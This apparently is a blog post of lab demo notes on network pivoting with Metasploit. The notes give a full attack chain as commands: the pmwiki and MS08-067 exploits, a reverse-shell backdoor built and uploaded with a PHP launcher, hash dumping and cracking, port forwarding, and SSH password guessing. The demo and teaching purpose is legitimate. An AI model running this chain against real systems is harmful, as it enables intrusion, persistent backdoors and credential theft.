UoB pivoting demo
These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..
Thats all for now..
Stay tuned :)
- Open Armitage
- Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24
- Find attacks
- Visit site (http://172.16.128.3) and attack
- Exploit using CVE-2011-4453 (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
- Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
- Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
- cat /root/Tools/meh.php
<?php
system("runme.exe");
?>
- Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
- Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
- Open a Terminal and
wget http://172.16.128.3/meh.php
- Second session now has full system privs
- Get hashdump
- Crack with ophcrack
- Check out routes with ipconfig/route (time to pivot!)
- Scan subnet using arpscan
run arp_scanner -r 10.1.87.1/24
- Scan hosts using metasploit tcp scanner
- Locate windows server
- Locate linux server
- Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
- Take hash and crack with ophcrack
- Compromise linux box
- Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r 10.1.87.5
- Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j
Thats all for now..
Stay tuned :)